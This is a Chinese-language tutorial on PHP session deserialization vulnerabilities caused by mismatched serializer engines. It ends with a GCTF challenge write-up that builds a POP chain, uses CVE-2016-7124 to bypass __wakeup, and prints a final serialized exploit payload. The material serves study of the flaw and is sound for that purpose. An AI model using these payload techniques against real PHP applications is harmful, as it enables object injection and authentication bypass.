详解PHP的session反序列化漏洞问题

在php.ini中存在三项配置项:

session.save_path="" --设置session的存储路径

session.save_handler="" --设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)

session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动

session.serialize_handler string --定义用来序列化/反序列化的处理器名字。默认使用php

以上的选项就是与PHP中的Session存储和序列话存储有关的选项。

在使用xampp组件安装中,上述的配置项的设置如下:

session.save_path="D:\xampp\tmp" 表明所有的session文件都是存储在xampp/tmp下

session.save_handler=files 表明session是以文件的方式来进行存储的

session.auto_start=0 表明默认不启动session

session.serialize_handler=php 表明session的默认序列话引擎使用的是php序列话引擎

在上述的配置中,session.serialize_handler是用来设置session的序列话引擎的,除了默认的PHP引擎之外,还存在其他引擎,不同的引擎所对应的session的存储方式不相同。

php_binary:存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值

php:存储方式是,键名+竖线+经过serialize()函数序列处理的值

php_serialize(php>5.5.4):存储方式是,经过serialize()函数序列化处理的值

在PHP中默认使用的是PHP引擎,如果要修改为其他的引擎,只需要添加代码ini_set('session.serialize_handler', '需要设置的引擎');。示例代码如下:

session 的目录在 /var/lib/php/sessions 中

  1. <?php
  2. ini_set('session.serialize_handler', 'php_serialize');
  3. session_start();
  4. $_SESSION['name'] = 'spoock';
  5. var_dump($_SESSION);

在 php_serialize 引擎下,session文件中存储的数据为:

a:1:{s:4:"name";s:6:"spoock";}

php 引擎下文件内容为:

name|s:6:"spoock";

php_binary 引擎下文件内容为:

names:6:"spoock";

由于name的长度是4,4在ASCII表中对应的就是EOT。根据php_binary的存储规则,最后就是names:6:"spoock";。(突然发现ASCII的值为4的字符无法在网页上面显示,这个大家自行去查ASCII表吧)

PHP Session中的序列化危害

PHP中的Session的实现是没有的问题,危害主要是由于程序员的Session使用不当而引起的。

如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样,会导致数据无法正确第反序列化。通过精心构造的数据包,就可以绕过程序的验证或者是执行一些系统的方法。例如:

$_SESSION['ryat'] = '|O:1:"A":1:{s:1:"a";s:2:"xx";}';

php文件如:

  1. <?php
  2. ini_set('session.serialize_handler', 'php_serialize');
  3. session_start();
  4. $_SESSION['ryat'] = '|O:1:"A":1:{s:1:"a";s:2:"xx";}';

访问后得到session文件中的内容如下:

root/var/lib/php/sessions cat sess_e07gghbkcm0etit02bkjlbhac6

a:1:{s:4:"ryat";s:30:"|O:1:"A":1:{s:1:"a";s:2:"xx";}

但此时模拟在其他页面使用不同的php引擎来读取时的内容如下:(默认使用php引擎读取session文件)

  1. <?php
  2. #ini_set('session.serialize_handler', 'php_serialize');
  3. session_start();
  4. #$_SESSION['ryat'] = '|O:1:"A":1:{s:1:"a";s:2:"xx";}';
  5. class A {
  6. public $a = 'aa';
  7. function __wakeup() {
  8. echo $this->a;
  9. }
  10. }
  11. // var_dump($_SESSION);

访问该页面输出xx

  1. xxarray(1) {
  2. ["a:1:{s:4:"ryat";s:30:""]=>
  3. object(A)#1 (1) {
  4. ["a"]=>
  5. string(2) "xx"
  6. }
  7. }

这是因为当使用php引擎的时候,php引擎会以|作为作为key和value的分隔符,那么就会将 a:1:{s:4:"ryat";s:30:" 作为SESSION的key,将 O:1:"A":1:{s:1:"a";s:2:"xx";} 作为value,然后进行反序列化,最后就会得到A这个类。

这种由于序列话化和反序列化所使用的不一样的引擎就是造成PHP Session序列话漏洞的原因。漏洞在加载使用php引擎的页面时session去读session中的内容并反序列化导致漏洞触发,不需要任何输出

GCTF上的一道session反序列化漏洞分析:

index.php中内容为:

  1. <?php
  2. //error_reporting(E_ERROR & ~E_NOTICE);
  3. ini_set('session.serialize_handler', 'php_serialize');
  4. header("content-type;text/html;charset=utf-8");
  5. session_start();
  6. if(isset($_GET['src'])){
  7. $_SESSION['src'] = $_GET['src'];
  8. highlight_file(__FILE__);
  9. print_r($_SESSION['src']);
  10. }
  11. ?>
  12. <!DOCTYPE HTML>
  13. <html>
  14. <head>
  15. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  16. <title>代码审计2</title>
  17. </head>
  18. <body>

在php中,经常会使用序列化操作来存取数据,但是在序列化的过程中如果处理不当会带来一些安全隐患。

  1. <form action="./query.php" method="POST">
  2. <input type="text" name="ticket" />
  3. <input type="submit" />
  4. </form>
  5. <a href="./?src=1">查看源码</a>
  6. </body>
  7. </html>

query.php 中的内容为:

  1. /************************/
  2. /*
  3. //query.php 部分代码
  4. session_start();
  5. header('Look me: edit by vim ~0~')
  6. //......
  7. class TOPA{
  8. public $token;
  9. public $ticket;
  10. public $username;
  11. public $password;
  12. function login(){
  13. //if($this->username == $USERNAME && $this->password == $PASSWORD){ //抱歉
  14. $this->username =='aaaaaaaaaaaaaaaaa' && $this->password == 'bbbbbbbbbbbbbbbbbb'){
  15. return 'key is:{'.$this->token.'}';
  16. }
  17. }
  18. }
  19. class TOPB{
  20. public $obj;
  21. public $attr;
  22. function __construct(){
  23. $this->attr = null;
  24. $this->obj = null;
  25. }
  26. function __toString(){
  27. $this->obj = unserialize($this->attr);
  28. $this->obj->token = $FLAG;
  29. if($this->obj->token === $this->obj->ticket){
  30. return (string)$this->obj;
  31. }
  32. }
  33. }
  34. class TOPC{
  35. public $obj;
  36. public $attr;
  37. function __wakeup(){
  38. $this->attr = null;
  39. $this->obj = null;
  40. }
  41. function __destruct(){
  42. echo $this->attr;
  43. }
  44. }
  45. */

思路如下:

这题中我们构造一个TOPC,在析构的时候则会调用echo $this->attr;;

将attr赋值为TOPB对象,在echo TOPB的时候会自动调用__tostring魔术方法

在__tostring中会调用unserialize($this->attr),因为后面用到token和ticket,所以显然时TOPA对象。后面判断需要$this->obj->token === $this->obj->ticket,所以在序列化的时候进行指针引用使$a->ticket = &$a->token;,即可绕过判断。

至于为什么(string)$this->obj会输出flag,后台写的login可能是__tostring吧。

其中反序列化字符串中会有一个__wakeup()函数清空里面的参数,我问可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。

最后的代码为:

  1. $testa = new TOPA();
  2. $testc = new TOPC();
  3. $testb = new TOPB();
  4. $testa->username = 0;
  5. $testa->password = 0;
  6. $testa->ticket = &$testa->token;
  7. $sa = serialize($testa);
  8. $testc->attr = $testb;
  9. $testb->attr = $sa;
  10. $test = serialize($testc);
  11. echo $test;

最终payload为:

O:4:"TOPC":3:{s:3:"obj";N;s:4:"attr";O:4:"TOPB":2:{s:3:"obj";N;s:4:"attr";s:84:"O:4:"TOPA":4:{s:5:"token";N;s:6:"ticket";R:2;s:8:"username";i:0;s:8:"password";i:0;}";}}